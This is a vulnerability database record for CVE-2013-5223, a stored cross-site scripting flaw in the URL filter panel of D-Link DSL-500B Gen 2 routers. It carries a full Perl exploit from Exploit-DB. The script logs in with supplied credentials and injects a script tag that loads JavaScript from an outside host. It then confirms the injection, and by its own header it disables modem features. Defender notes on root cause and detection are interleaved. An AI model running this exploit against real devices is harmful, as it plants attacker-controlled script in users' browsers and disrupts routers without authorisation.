ID

VAR-E-201311-0047


CVE

cve_id:CVE-2013-5223

Trust: 3.0

sources: BID: 63648 // PACKETSTORM: 123976 // EXPLOIT-DB: 36988 // EDBNET: 58265 // EDBNET: 21292

EDB ID

36988


TITLE

D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36988

DESCRIPTION

D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting. CVE-2013-5223, CVE-99603. Webapps exploit for the Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 36988

AFFECTED PRODUCTS

vendor:d link model:dsl-500b gen scope:eq version:2

Trust: 1.6

vendor:d link model:router 2760n scope: - version: -

Trust: 0.5

vendor:d link model:dsl-2760u-bn scope:eq version:0

Trust: 0.3

sources: BID: 63648 // PACKETSTORM: 123976 // EXPLOIT-DB: 36988 // EDBNET: 58265

EXPLOIT

#!/usr/bin/perl
#
# Date (dd-mm-yyyy): 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device to access the page and reconfigure the modem again,
# and causes script execution in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

# Proof-of-concept flow for the stored XSS in the URL Filter panel
# (CVE-2013-5223, per the advisory this script is attached to):
#   1. authenticate with HTTP Basic credentials supplied on the command line,
#   2. store a <script> element in the URL filter list via todmngr.tod,
#   3. read the list back and check whether the element comes back unencoded.
#
# Defender notes:
#   - Root cause visible from this flow: the TodUrlAdd value is accepted as-is
#     and, if the final check succeeds, echoed by the urlview page without HTML
#     output encoding. The fix belongs on the device side: validate the value
#     as a host/URL on input and HTML-encode it on output.
#   - The write is an authenticated request, so the script only works with
#     valid management credentials; restricting who can reach the management
#     interface limits exposure.
#   - Detection: requests to todmngr.tod with action=set_url whose TodUrlAdd
#     parameter contains "%3Cscript" (or raw angle brackets) are the signature
#     of this request.

# Positional arguments: base URL of the device, username, password.
# These are read before the argument count is checked; the values are only
# used in the else-branch below, which runs when exactly three were given.
my $ip = $ARGV[0];

my $user = $ARGV[1];

my $pass = $ARGV[2];

# Anything other than exactly three arguments prints the banner and usage.
if (@ARGV != 3){

print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

}else{

# Drop one trailing "/" so the endpoint path can be appended with a single slash.
$ip = $1 if($ip=~/(.*)\/$/);

print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";

# URL-encoded <script> element whose src attribute points at an externally
# hosted file (protocol-relative URL on xlabs.com.br). It is kept encoded here
# because it is placed directly into a query string below.
my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";

my $ua = new LWP::UserAgent;

# NOTE(review): the key is spelled "UserAgent", not "User-Agent" or
# "User_Agent", so this looks like it sends a nonstandard "UserAgent:" header
# and leaves the real User-Agent at the LWP default. Confirm against a capture.
# Either way the literal string below is a usable log/IDS indicator.
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

# HTTP Basic authentication: the credentials travel base64-encoded in the
# Authorization header, i.e. readable on the wire when the target URL is
# http:// as in the usage line above.
$hdrs->authorization_basic($user, $pass);

# Removes a trailing newline from the base URL, if any (done after the slash
# stripping above).
chomp($ip);


print "[+] Preparing exploit...\n";

# State-changing request issued as a GET: action=set_url adds an entry to the
# URL filter list. TodUrlAdd carries the marker text "GameOver" followed by the
# encoded <script> element; port_num is a fixed value.
my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";

my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

print "[+] Prepared!\n";

print "[+] Requesting and Exploiting...\n";

my $resp = $ua->request($req);

# is_success only says the device answered with a 2xx status; it does not by
# itself show that the entry was stored.
if ($resp->is_success){

print "[+] Successfully Requested!\n";


# Second request: fetch the URL filter list view with the same credentials.
my $url = "$ip/todmngr.tod?action=urlview";

$req = new HTTP::Request("GET",$url,$hdrs);

print "[+] Checking that was explored...\n";


my $resp2 = $ua->request($req);


# If this second request is not a 2xx, nothing further is printed.
if ($resp2->is_success){

# as_string serialises the whole response (status line, headers and body), so
# the substring search below is not limited to the HTML body.
my $resultado = $resp2->as_string;

# The decoded payload appearing verbatim means the stored value was returned
# without HTML encoding, which is the stored-XSS condition being demonstrated.
if(index($resultado, uri_unescape($payload)) != -1){

print "[+] Successfully Exploited!";

}else{

print "[-] Not Exploited!";

}
}

}else {

# First request failed (non-2xx or transport error): print the status message.
print "[-] Ops!\n";
print $resp->message;

}

}

Trust: 1.0

sources: EXPLOIT-DB: 36988

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 36988

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36988

TYPE

URL Filter Configuration Panel Persistent Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 36988

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 123976

CREDITS

XLabs Security

Trust: 0.6

sources: EXPLOIT-DB: 36988

EXTERNAL IDS

db:NVDid:CVE-2013-5223

Trust: 3.0

db:EXPLOIT-DBid:36988

Trust: 1.6

db:EDBNETid:58265

Trust: 0.6

db:0DAYTODAYid:21502

Trust: 0.6

db:EDBNETid:21292

Trust: 0.6

db:PACKETSTORMid:123976

Trust: 0.5

db:BIDid:63648

Trust: 0.3

sources: BID: 63648 // PACKETSTORM: 123976 // EXPLOIT-DB: 36988 // EDBNET: 58265 // EDBNET: 21292

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-5223

Trust: 2.7

url:https://www.exploit-db.com/exploits/36988/

Trust: 0.6

url:https://0day.today/exploits/21502

Trust: 0.6

url:http://seclists.org/fulldisclosure/2013/nov/76

Trust: 0.3

url:http://www.dlink.com.tr/en/arts/117.html

Trust: 0.3

sources: BID: 63648 // PACKETSTORM: 123976 // EXPLOIT-DB: 36988 // EDBNET: 58265 // EDBNET: 21292

SOURCES

db:BIDid:63648
db:PACKETSTORMid:123976
db:EXPLOIT-DBid:36988
db:EDBNETid:58265
db:EDBNETid:21292

LAST UPDATE DATE

2022-07-27T09:49:46.281000+00:00


SOURCES UPDATE DATE

db:BIDid:63648date:2013-11-10T00:00:00

SOURCES RELEASE DATE

db:BIDid:63648date:2013-11-10T00:00:00
db:PACKETSTORMid:123976date:2013-11-11T23:46:32
db:EXPLOIT-DBid:36988date:2015-05-11T00:00:00
db:EDBNETid:58265date:2015-05-11T00:00:00
db:EDBNETid:21292date:2013-11-12T00:00:00